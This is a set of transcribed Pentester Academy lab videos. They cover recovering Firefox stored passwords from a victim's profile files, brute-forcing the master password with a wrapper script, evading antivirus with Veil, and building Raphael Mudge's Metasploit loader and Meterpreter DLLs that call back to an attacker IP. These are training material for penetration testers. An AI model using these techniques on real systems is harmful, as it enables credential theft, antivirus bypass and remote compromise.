to explore some of these files. Right, fantastic. So we have at the very least a file called key3.db, and we are still waiting for a couple of other files to download. Everything has downloaded. Fantastic. We do an ls once again. So we have key3.db, and there's one other interesting file which is important to us, and that is signons.sqlite. Right? Couple of these other files we'll take up in later videos. In this video, our focus is going to be to recover stored passwords from a browser on a victim which you've just broken into. Now note that we don't need any special privileges, and we only need to go ahead and even break in as the victim to recover all this data. So there are a lot of these interesting files you've seen. I've given you a link where you can learn more about some of these file formats and what they store. So definitely have a look at that. Now coming to actual password recovery from Firefox. Now this is how Firefox password manager works. Whenever a new profile is created, a random key is generated and this key is stored in key3.db. Now keep in mind, if the user uses a master password, then this key which we have generated is further encrypted using the master passwords hash. Now when a user then goes ahead, surfs the internet, stores usernames and passwords, all of those are encrypted and stored in a file called signons.sqlite, and the encryption key is what was created at the very beginning, the random key stored in key3.db. Now there are other small interesting things like the encryption algorithm, what role the salt plays and all of that, which really is a discussion more on encryption, and we would end up deviating from the purpose of this video. But I've given you a link down here which you can click and learn more about the exact process if that intrigues you. Okay, so really there are two important files, signons.sqlite and key3.db. So let's go back in here and let me actually open up the SQLite browser so that we can have a look at some of these files. So I'm going to go inside temp profile and let me open up, let's say, key3.db, and what you would notice is this basically says this isn't a valid SQLite file. This is where the encryption key is, and if we go ahead and open up the other one, which is cookies.sqlite, this is the acceptable format. Actually notice we can clearly see the entire structure, the cookies and all of that, and then after that you have the actual data including the cookie value and all put in here, right? Now if we look at signons.sqlite, which is the file of interest in here, then you would actually notice that username, passwords, etc. are there in this table, and we can clearly see that here we have the encrypted username and here we have the encrypted password, as you can see in here, right? And this is really what we want to recover. Now this is where there are a ton of tools out there. The one I will actually use is a Python script called firepwd.py. The reason for using this script specifically is because it's in Python, which means you can read the source code, extend it, make it do wacky things, right? And by the way, there are many tools available across platforms which I leave you to investigate. So here is what I've done. I've downloaded this tool from GitHub, right? And it's already in here. Now this does have dependency on certain libraries, but the good news is if you're using Kali Linux, the libraries are already installed. So PyASN1, PyCrypto, etc. is installed. So there isn't much for you to do here. You can use the tool directly. So let's say we run the tool with the -h option. To actually find that, we can pass the directory to it where the files are stored. So we can use the -d option, then basically go 2 levels down, go inside the temp directory and give this the directory. There you go. It does its crunching and it basically says decrypted password for twitter.com vivekr@securitytube.net, and the password is this is complex 890. Fantastic. right? So this is how trivial it is once you have key3.db and signons.sqlite to recover the password if no master password is set. Now we'll take up the master password case in the next video. So try this out and see for yourself why it's important to create a master password. That's all I have in mind for this video. Of course, you also have the Metasploit module which can do some of this stuff. I leave it to you as an exercise to try this out on your own. And if you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the network pen testing series at Pentester Academy. Now this is part 3 of the AV evasion is no silver bullet. Now in the last video we saw very interesting characteristics of AVs, which is depending on what the AV can detect, just adding or subtracting a layer of encryption, or for that matter, you could try it even with compression and encoding, could make a ton of difference. So now in this video we are going to use the shellcode inject, which is AES encrypted, Fiherian enabled, and then we are going to use a Pi installer which would add a little bit of obfuscation, and then let's see what happens. So let's jump right in. Go back to the main menu. I'm going to do a list. I'm going to pick up the same one, 27. So let's do a use 27. Fiherian is enabled, which is fantastic. So let me go ahead and do a generate. Let's use MSF Venom. Go with the default one, 192.168.10.10, 999. And now in the last option, let's just go ahead and first give this right? Let's do this enabled, and then by installer obfus, right? Kate. There you go, really long. Now let's use spawn installer, which is actually an obfuscated Pi installer loader, right? This can be very useful, as a lot of AVs now may start to fingerprint the Pi installer technique, right? Let's use choice 2, and there we go. And here it is, right? Now let's go back in here. So let's go back in here. This is the Norton one. Let's see what happens with this one. Scan. Okay, we are green here. Let's go to Kaspersky, which complained for the last one. Save this in here, close it. Scan. Aha, if you notice at this time it says no threads detected. Cool. And let's look at our friend AVG. Let me refresh the page. Save this. Go to the downloads directory. Scan with AVG. Again, no threats detected. Right? Fantastic. Then let me go back to the host system so that we can now copy this to the USB device. There we go. So let me actually take the Whale output. Here it is. Paste it in here. Check the device. Remove it. Goes back to the host system. Open it up. And now let's try McAfee. Again, no issues detected, which is fantastic, right? So if you notice, for now, this technique of the Fiherian, and using the PyInstaller obfuscate is probably the best one, which seems to be evading all the AVs at this point, right? And this is how we can go ahead and benchmark against different combinations of cryptors and payloads and all of that. Okay, so now that we've tested these payloads, it's really time to actually see if they're working, right? So let's go ahead and run MSF console by giving it the RC file, which should be under Whale handlers. There we go. So we'll allow MSF console to start. They should take a bit. And then we'll run the binaries on each of these systems, right, and see what happens. And that should be the ultimate test of if it works. Now you'd be surprised to see that there could be interesting things happening where maybe, at runtime the AV might intervene, right? It sees some suspicious behavior and it intervenes. You never know. So let's wait for it. Okay, so now we are waiting for the shells in the background. Let me execute the binaries on each of the systems. So let me execute, let's go to the folders and let me run this. So this is now run. Aha! We have our very first Metasploit session in here. Let me now go to Kaspersky, run again. Let's go back in here. Aha! My second session is here already. Let's go in here, Norton, run. Let's run it. The system has a little bit of a low RAM issue. I think I only gave it 512. Should make it at least a gig. So I have 2 Metasploit sessions right now. Fantastic. Third one from this system is still awaited. Maybe Norton is able to run its magic. This says Norton blocked an attack, and here it is. An intrusion attempt was blocked. Attack Metasploit reverse TCP. Interesting, my friend Norton. So you allow us to play all the games on the hard drive, but when the network connection happens, well, Norton wakes up. Interesting. Matches the signature of a known attack. The attack was resulted from this binary. Interesting. Now, if you note, right, looks like based on what happened when the reverse TCP was coming in, at that point, Norton picked up and has added an alarm. Good. Anyway, so coming back to the topic of AV evasion, as you can clearly see, the incredible number of unknowns and how different AVs can behave significantly in different ways, right? So hopefully this was an interesting session that AV bypass has no silver bullet. If you notice, the last payload seemed to have bypassed all the AVs, but when we ran it, Norton seemed to have picked up the reverse Metasploit, which means we might need to check with other payloads or figure out really what is triggering the alarm and see if we can either obfuscate that or go ahead and do something else, right? So hopefully I have driven home the fact that AV evasion is no silver bullet. And if you're enjoying your time at Pen Tester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the network pen testing course at Pen Tester Academy. Now in this video, we will look at how to use a dictionary attack when the Firefox passwords and usernames are protected using a master password. So if you haven't already, you can go to settings and create a master password. I've already created one, and then just like in the previous video, I've gone ahead and downloaded key3.db as well as signons.sqlite from the victim machine onto the attacker machine. Now keep in mind that these passwords are now protected by a master password, and hence Fire PWD tells you to use this specific option, right? Now, as one can clearly imagine, this can at best be a dictionary attack which one could try. The problem really is that Fire PWD does not offer a dictionary attack as one of the options. And in my experience, I've seen that a lot of tools do this. They would work for a single password for decryption or any other functionality, but do not allow you to try an entire dictionary. Now this is where either we need to find another tool or script over Fire PWD in order to convert it into a dictionary based cracker. So this is pretty much what I've done. I've created a very simple Python script, and again, Python for pen testers is a course which we offer on Pen Tester Academy and separately, so please have a look. And in this specific script, which I call Firefox Fire PWD controller, I go ahead, open up the word list, pick up individual passwords from the word list, and then call Fire PWD with the -p option. Now what you would notice is whenever Fire PWD manages to crack the password, this time let me give a valid master password, which is ABC123, you would actually notice it says decrypting login/password pairs. So this phrase in here is a good indicative that the password supplied was correct. And this is really what we are going to check for inside our controller. So all I'm doing is, rather than the whole phrase, I'm just going to search for the word decrypting in the output of fire pwd. So here is what happens. We iterate through our word list and call fire pwd excuse me, with the -p option for each of the words. Now, if the password is incorrect, then we basically will not get the message decrypting username, passwords, or whatever we saw right now, and which would pretty much mean we should continue with the next word in the word list. But if we manage to get this, it means the decryption has succeeded, and that is the master password. So based on this is a very simple script which I've written. I've also created a simple word list for illustration containing a couple of lines in here with the master pass in there. And now you can invoke Firefox Fire PWD controller with the list, and there you go. For the first three, it basically says that failed with master password blah blah blah, while for the last one it confirms that ABC123 is the master password. Once you find this out, you can very easily use it with Fire PWD again to decrypt the username password pairs. Awesome. So what I've done is, this entire directory is available for download below the video so that you can get the script. You can also try to write your own. And the only modification I've done in Fire PWD is in the very first line I've added the interpreter address or the interpreter location, right? So this is an example how existing tools may need to be wrapped over and scripts written in order to get some useful functionality out of it. Of course, there are tools which also allow you to import word lists and all of that, but I think you should have such a template as the one I have shown here kept handy to go ahead and script around many tools whenever the need arises. So hopefully this video was fun, and if you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we will continue with AV evasion and look at how you can accomplish this using Raphael Mudge's Metasploit loader. Now, Raphael Mudge implemented the Metasploit loader, and very simply put, what this is really stage 1 of the Meterpreter payload. And keep in mind that stage 1 does not contain any Meterpreter DLL or anything like that. All it does is connects to the Metasploit server, goes ahead and reads the DLL and loads it up in memory and passes control to it for execution. So let's understand this a bit more in detail. Now, these links are directly from the Metasploit mailing list. And Egypt, one of the core developers of Metasploit, what he mentioned is that if you write any program which connects to the handler, this is really your exploit multi-handler, which is running on the Metasploit side, and reads the first 4 bytes, which are actually the length of the DLL or the payload which is to come, and then allocates a buffer of that size, copies the payload in there, and then just passes control to it, would function as the stage 1 of a Metasploit payload. Now, someone additionally pointed out that we need to keep in mind that because we want to reuse the same socket which the stage 1 loader used, we would need to ensure that EDI for 32-bit systems contains the socket descriptor so that it can be reused. And in the case of 64-bit, RDI should contain it, right? So with this piece of information, Rafael Mudge, a good friend and the creator of Armitage, implemented a bare-bone Metasploit loader in C. And I'll just take you to the important parts in here. So he opens up a socket, and the arguments, of course, are the host and the port. This is a wrapper function. What it does, it creates a socket. You can go up in here. It creates a socket and connects to the host and port which you mentioned. And then after that, reads the first 4 bytes, which is really going to be the length of the larger payload to come, and then allocates a read write execute buffer using virtual alloc of the size of the payload expected, and then he loads the payload in there. You can clearly see here. We of course remember to prepend the move EDI followed by the socket number in there. As you can clearly see, these are being copied in here. And then after that, we basically pass control to that buffer, and it goes ahead and loads up the actual Meterpreter DLL in memory and executes it. So do not worry if you don't know much of C programming. Let's try and do this, right? So let me copy this to clipboard. Now I have a Windows 8 VM. It's actually 8.1 Enterprise Eval, which is running AVG, and I have my Kali machine. So let me actually go to the temp directory. Let me do a git clone so that I can get all the files. Enter. Let's go inside the Metasploit loader directory. Let's go inside the source directory. And now let's compile this. Now I'm going to be using the Ming compiler to do this. You can install this. Ideally, you should have, if you followed the last couple of videos of how to do AV evasion using Whale. If you haven't, please install this. Now, when you try to compile this, let's try this. main.c-o. Let's call this Metasploit loader.exe. Right, WS2 is basically WinSock2 32-bit. Now you actually notice that we end up getting a little warning which says include WinSock2 before Windows.h. So let's fix that. Now let's do this again. Oops. Strip the binary. And we see we have a 32-bit PE, just as what we wanted. Now let's just go ahead and run a little web server in here so that we can download this to our victim machine. I'm using Python simple HTTP server port 80 to do this. And in the meantime, let me also start MSF console. Let's go back to our Windows machine. Let's open up the browser. Already on the same page, so let's download this, save it. Now let's go to the downloads directory and scan this with AVG. So let's scan this. And if you notice, it says no threats detected. Fantastic. Let's go back to our attacker VM. Metasploit is still loading. Let's wait for a bit. Now, of course, the reason AVG or most AVs don't pick this up is the Metasploit loader itself is a very harmless program, right? And implementing very common functionality of connecting to a remote host and getting data from it. Of course, the virtual alloc and all of that after that is a bit more suspicious because it's like a precursor to the reflected DLL injection which we are planning. But hey, these guys don't pick it up yet. Now, the reason, even though the Metasploit's own first stage loader is pretty much implementing the same functionality, gets detected, is because AV manufacturers have actually created signatures for that specific implementation. And it's really funny how just by changing the program but pretty much doing the exact same thing, you can get away with it. Okay, let's set up the handler. Use exploit multi-handler. Let's set the payload to Windows Meterpreter reverse TCP. Let's set lhost. This is the attacker machine IP. And let me set the L port to be a slightly more unconventional 9000. And there we go. We have our handler set up. Now let's go to our Windows machine. Let's open up command prompt. Let's go inside the downloads directory. If you run Metasploit loader without any arguments, you're prompted for a host and a port. So let's fill that in, 192.168.10.10, 9000. There you go. If we go back to the attacker machine, we have a Meterpreter. Awesome. So let's do a sysinfo. Let's do a get UID. Let's do a PS. And everything looks pretty much fine, right? Fantastic. And we are on this machine. Awesome. Now, this was the case in which the Metasploit loader, you would have to feed in the user, the host and the host and the port number. Of course, this can be mildly annoying and you would want to do that up front. So that's easy as well. We could just modify the C source code very trivially. Let's do that. So we'll go to the main function and we can clearly see this is the place where we are accepting the inputs. We have to remove this chunk of code, and this is the place where we feed in the arguments. So let's modify these. argv1 is the IP address, and the second argument is going to be the port number. There we go. Let's recompile this and let's call this maybe something different. Let's say autoloader. Let's strip it. Run this. Let's go back in here. Fetch the page. Download this. Scan it with AVG. Everything looks fine. Let's set up the handler. And let's go ahead and execute it. I'm on the host machine. So let's execute it. Of course, this is an unknown program. In later videos, I'll show you how to use known programs and do fun stuff. So wait for that. Let's run it. It's running. Of course, this isn't the most optimized way because you can see we have a window, but it's trivial to modify and change all of that. Probably show that to you in a different exercise. And there you go. Here we are, we have our brand new shiny Metasploit, and we are able to work on it, right? Now, here is one quick thing which I want to point out. Right now, this works perfectly fine. AVG isn't picking it up, it isn't causing any issues for you. However, what I noticed is the moment I try to migrate, AVG does detect suspicious things, right? Because when we try to inject into another process, maybe the Metasploit payload is using the create remote thread and a bunch of other things, and AVG picks it up. So let's say I want to migrate to explorer.exe. Here it is, 2464. Hit a migrate, and if we go back, there you go, right? AVG has detected on its behavioral based detection that something is wrong in here. So you are fine till the case you're running this loader independently and doing stuff on the system. But the moment you try to migrate, at the very least, at least AVG seems to be complaining, right? You can test it out with the other AVs and see what your experience is. AVG, I think, pretty much freaks out and wants you to restart the system. So let's go ahead and do that. But truth be told, as you're clearly seeing, right, you have to understand in depth what can trigger the AV. In later videos, I'll show you demos in which we can load as part of a trusted executable by doing DLL hijacking, and that does seem to solve a bunch of things, right? Okay, so hopefully you had fun. Play with the Metasploit loader. This is the 32-bit one. In the next video, I'll show you how to extend this to 64-bit loaders. That's all for this video. If you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the network pen testing series at Pentester Academy. Now in this video, we will look at how to extend the Metasploit loader, which we saw in the last video, to a 64-bit version. Now the Metasploit loader by Raphael Mudge is fantastic, and as we've seen in the last video, allows us to evade the AV. Now unfortunately, Raphael only has put the 32-bit version and not the 64-bit one. In this video, we will see how we can trivially extend the Metasploit loader 32-bit to its 64-bit version. Now, in order to do this, we would require a couple of development tools installed in our VM. So I would have gone with dev C++. Unfortunately, the project seems to be a bit dead, and the updated version of it is really the Orwell dev C++, which is available in this link. Please download the Orwell dev C++ and install it inside one of your Windows VMs. Now in this video, I'm going to be using a Windows 7 VM which has my Norton AV, and I have already installed the Orwell dev C++ in it. Now the indication that you've done it right, you should see both 32 as well as 64-bit versions of GCC available to you for compilation. Okay. Now let's actually look at the Metasploit loaders page on GitHub. And if you recall, in the last video, we had seen these two mailing list posts. The second post, which was made by, I think, the second post basically by Michael is really interesting. In this, he actually mentions that for a 64-bit system, you have to use the RDA register. And of course, this is now going to need 10 bytes because 2 bytes would be the move RDI, which is 45BF, and 8 bytes would really be the socket descriptor number, as this is a 64-bit system, right? So here is what I'm going to do. I have gone ahead and picked up the raw version of the 32-bit loader. You can pick it up by clicking on raw, copy it, And then let's go inside our Windows VM. I'm going to create a new project. And let me call this the mloader 64, right? Almost sounds like a weapon. Console application. It's going to be a C project. Let's hit an OK. And there you go. So I don't need the base template code. I'm going to remove it. Instead, I'm going to paste the 32-bit version of the Metasploit loader. So now let's excuse me, save that. Let's call this mloader 64 as well. And now let's make some modifications. Now, of course, keep in mind that currently we would actually require the first 10 bytes, right? The first 2 bytes, of course, is going to be the move EDI followed by the socket descriptor. So let's go ahead and do this. So buffer, we would have to, of course, change this from 5 and make it 10, right? Originally, we only wanted a single byte, which was move EDI, which was 1 byte, followed by 4 bytes of the socket descriptor, which made this 5. But now we need move RDI, which is 2 bytes, followed by an 8-byte socket descriptor, which makes it 10. So this 5 would change to 10. Now we would need to change this to move RDI, right? And based on the documentation which we've seen, and of course you can go ahead and verify this, 48BF is really the hex code for move RDI. So I'm going to change this to 48. Then I'm going to make buffer 1 to BF, right? So we have 48BF. Fantastic. Now I'm going to copy out the 8 bytes of the socket descriptor. And of course, this would be buffer plus 2 because we now have 2 bytes describing move RDI. And this 4 would become an 8. There we go. Finally, we would go ahead and change the buffer plus 5 as expected to buffer plus 10. And after this point, we copy the DLL and then pass control to it, right? Fantastic. Now let's go ahead, compile this. And remember in the compiler options to give a -l ws2_32. Let's compile. This gives us the same warning. WinSock2 needs to be before windows.h. Okay, let's do that. Let me recompile this again. Okay, perfect. The compilation has succeeded. Everything is under documents. So let me open up the folder. Let's go to documents. And here is my mloader64. Just going to copy it out to the desktop. Let's open up a command prompt. Let's change to desktop. And let's run mloader without any arguments. And it prompts for a host and port just as expected. So now let's set up our attacker machine. Now our attacker machine has IP address 192.168.10.10. Let's set up Metasploit so that we can receive our stage 1. Now a common mistake is people using the same payload, which is Windows Meterpreter reverse TCP, and that wouldn't work in this case. So let's demo that first, and then we will ensure that we choose the right 64-bit payload. So let's wait for a bit. Our Metasploit friend is taking his own sweet time. Okay, let's use exploit multi-handler, set payload to, and this is the common mistake, Windows Meterpreter reverse TCP, set lhost to 192.168.10.10, set lport to 9999. Let's hit an exploit. Of course, what this would end up doing is when our 64-bit process contacts Metasploit, Metasploit sends back a 32-bit DLL, which that process tries to load, and of course it would fail and crash. So mloader 192.168.10.10.9999. And there you go. As you can see, the loader has failed. We have sent the DLL, by the way, or rather we are sending it, and we need to close the program. Now, the right way, of course, is to select the appropriate 64-bit payload in here. So I'm going to do a set payload Windows x64 Meterpreter reverse TCP. Hit exploit. Go back to the VM. This time around it doesn't crash. And there you go. We have our Meterpreter session. Right? Fantastic. So this is how you can extend the 32-bit Metasploit loader from Refile much to support 64 bits. Now keep in mind that this loader alone is no panacea against AV detecting you, right? At this point, AV detection seems to be failing, but you could actually notice very interesting things, as I pointed out in the last video, when you try to inject it into another process. Let's try and see if Norton can detect this. Norton does unusually take the longest time to finish the scan. Okay, now threads found. Cool. So that's all I had in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will look at an interesting concept, and that is running Meterpreter as a 32 or 64-bit DLL. So how are we going to accomplish this? Well, the first step is to go ahead and actually convert the first stage of the reverse TCP or the bind shell into a DLL. So let's look at how we can do this. I have my Kali machine, and we're going to use MSF Venom. Let's look at the different options. Now, to look at the different formats, we have to use help formats. And in the help formats, you can clearly see we have DLL in here. So let's go ahead and do this. So we're going to do an MSF Venom, Windows Meterpreter reverse TCP, lhost equals 192.168.10.10, lport equals, let's say, 9000. The architecture would be x86. The output format is DLL, and let's store this as let's say MSF rev meter.dll. Oh, I forgot the -p option, my mistake. Okay, and if you notice, it says no platform was selected. Well, I've already selected the payload to be of the Windows platform, so it should have figured this out, but that's okay. We can see we have a P32 DLL sitting here. So now let's go ahead and see how we can execute this on the Windows system. So I'm going to go in here. Let's run a web server in the same directory. Let's go back to the Windows machine, refresh this, save this DLL on the desktop. Now let's open up command prompt. Now this is a 64-bit Windows system, and the question really arises, how do we execute a DLL? So we can use run DLL32 to do that, but keep in mind, because we are on a 64-bit system, we need to ensure that we run this properly using the 32-bit run DLL. So there is a way by which you can do this very simply. The 32-bit run DLL is actually located in C drive Windows syswow64 run DLL.32. So let's run this. C drive Windows syswow64.run dll.exe, and the file we are interested in is in here. There we go. Now on the attacker side, of course, we will have to have a handler waiting. So let's start MSF console. And in the meantime, let's create the 64-bit DLL as well. So here is how we created the 32-bit one. 64-bit is simple as well. Let's first change the payload to x64. And let's change the architecture to x86_64. Let's actually add a little 64 at the end just so that we can figure this one out. I hope you guys are enjoying this. If you are, definitely write to us on Twitter. Okay, let's check. And we can see this is a 64-bit DLL which was created. Fantastic. Interestingly, both their sizes are pretty much the same. Still waiting for MSF console to come up. There we go. Use exploit multi-handler. Let's set the payload to Windows Metasploit reverse TCP. Set the L host to 192.168.10.10. Set L port to 9000. Hit exploit. Now we can go back in here. Now let's execute the 32-bit Metasploit. And if you notice, if we just do run DLL and just the DLL name, nothing happens. It's simply because we need to mention the actual function to call in the DLL. Now, if we go ahead and open this up in PE view, you would actually find that pretty much there is no export section in it. Even though typically DLLs do have export sections, right? So what should ideally happen is no matter what we call, the DLL entry point should run, and eventually we should just get the Metasploit. So I'm just going to say UBCD, right? Something non-existent. Something is happening in here. Let's go back, and there you go. We have our Metasploit on the box. Fantastic. And we should be able to clearly see here is where we are running. Let's do a get PID. And here you are, right? We are running within an x86 process, which we can clearly see in here. Fantastic. Now let's go ahead and run the 64-bit version of Metasploit. Let's first set the payload accordingly. Set exploit. Go back in here. Now just going to run C drive Windows System 32 and then run dll.exe. Let's download the 64-bit DLL. We still have to run the web server. Let's wait for the server to start. Go back in here, refresh, save this on the desktop. Now let's go back in here. Again, the same old routine. And this time we just have to be sure that we run the MSF rev matter 64.dll. Call anything you like inside of this. And there you go, right? It executes. And we should have our friendly little Metasploit shell in here. Fantastic, right? And this time around when we do PS, let's do a quick get UID as well. Oh, sorry, get PID. 1744. Here we are. And if you notice this time around, we are within a 64-bit process. As you can clearly see that, right? x86_64. Fantastic. And even if you actually see the last one when we did sysinfo, it clearly says that the current process is wow64, right? This pretty much is x86 emulation inside of the 64-bit Windows, right? What this means is you're running inside a 32-bit process under 64-bit Windows. Awesome. So this is how you can actually convert Meterpreter to a DLL and run it both, under 32 or 64-bit mode using run DLL. Now in the next video, let's look at how we can convert Raphael Mudge's Metasploit loader into a DLL and then again run it using run DLL. So hopefully you guys enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing course at Pentester Academy. Now in this video, we will look at how to run Raphael Mudge's Metasploit loader as a DLL using run DLL 32. So how are we going to convert the Metasploit loader into a DLL? Now, of course, one of the ways is to write out a full-blown DLL with DLL main following all the conventions, and that could be really very complicated. Now, the good news is that writing DLL main is really optional. And what we're going to do is a little hack in which we can compile the Metasploit loader as a DLL and then call the main function in the DLL to execute it. Now, depending on if we are using Metasploit loader 32 or 64-bit, we will use the appropriate run DLL. Now, in this video, I'm going to use just the 32-bit version, and I leave it to you as an exercise to do the 64-bit one. So let's jump right in. So first, let me copy out Raphael Mudge's Metasploit loader. If you're confused about what this is, then please consult previous videos in this series where we have looked at this. So let me open up main.c. Now we actually take the port number and the IP address as arguments. I just want that to be filled in so that we don't have to pass additional arguments, even though we can using run DLL. So I've removed those 3 lines which are checking for the number of arguments. Now I'm replacing argv1 by the attacker's IP. And I'm going to replace this with the port number, which we'll use as 9000. Now let's compile this as a DLL. You could pretty much put in any name. I'm just going to put main32 just so I remember this is the 32-bit version. We need to add the hyphen shared because this is a DLL and a shared library. Now let's run our Python server here. Refresh. I have some older stuff which I'm going to just throw into the dustbin. I'm going to copy main32 on the desktop. Let's open up a command prompt. Let's go to the desktop. And now let me actually use C drive Windows System 32, and then we're going to have this is the 32-bit one, remind yourself. So we're going to use this wow64 run dll32.exe and then give main32.dll comma main which is the actual export I would like to call. But before that, let me set up Metasploit. Use exploit multi-handler. Set payload to Windows, Meterpreter, reverse TCP, set our host to 192.168.10.10, set our port to 9000, exploit and wait. Now on the Windows machine, we can even do some basic analysis on the DLL with PEView before we run it. Now we'll actually find that this has a much more involved section. And if you look at the export table, you actually see that we have main, which is exported, a bunch of other functions as well which are defined inside the file, but main is something we can call, which also has the ordinal number 1, right? Fantastic. So now let's call this. Something seems to have happened, and it's good news. We have Meterpreter, right? And of course we are currently running as an x86 process, 32-bit mode, using Wow64, and we can very easily verify that. Here we are. Fantastic. Now let's actually check which of these DLLs is actually is detected by the AV. Now the MSF rev meterpreter.dll and the rev meterpreter64 is when we converted the meterpreter stage 1 into a DLL directly using MSF Venom. So let's see if Kaspersky can detect this. Scan. And if you notice, there you go, it has detected this. So let's delete this first file. It says restart, but we'll probably do it later on. Let's do a quick refresh. Now let me scan this one. Let's see what happens. Seem to be still scanning. It's almost like Kaspersky is stuck. Okay, let me just do a reboot and see what happens. Let's try and see if this scans this. Product seems to be almost hung. I don't want an advanced scan. Just going to pause the video momentarily. Now, as the scan is running the advanced disinfection, you can clearly see that one of the Meterpreter DLLs has disappeared. It's almost like it's, I think, scanning memory maybe. Well, we seem to still have a connection though. Let's wait for it and see if it removes the second one as well, or else we'll manually run a scan in just a bit. It's really very funny to observe all this AV behavior, and you'll find that different AVs behave in different ways. So come on, AVG. So come on, Kaspersky. It's gonna be 1 a.m. in the night. I need to finish this video. Work a bit more faster. Wow, that 97% seems to be really stuck. I'm just going to pause the video a bit again. Okay, Kaspersky seems to have rebooted my system. So I'm just going to wait for this to restart and see what happened. I'm pausing you guys once again. Okay, so looks like that DLL was deleted, but I really don't know why we had to pretty much restart the system. But hey, now I have the 64-bit Meterpreter DLL, and the main 32 of course is the Metasploit loader. Let me scan the loader first and see what happens. Well, I remember clicking for scan viruses, but nothing seems to be happening. Okay, great. Seriously, once again, this whole thing is going to just scan everything? Well, it basically says that main 32 no threats detected. So I'm hoping everything was okay. Right, let me just double check this. Okay, as you can clearly see, it says main32.dll is fine, right? And you can, just like in the last case, you can see the value of going ahead and creating your own stage 1. But now let's see if we are just as lucky when we look at the 64-bit one. I don't see anything in there. Let me try this again. Nothing seems to be really happening. So is the 64-bit DLL safe? Yeah. And usually, if you notice, it actually says the 64-bit Meterpreter DLL is safe. Right? Unusual, but you get the point. So this is how we can actually use the Metasploit loader, convert it into a DLL with hardly any other extra work required, and go ahead and do AV evasion. So guys, that's all I have for this video, and if you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you.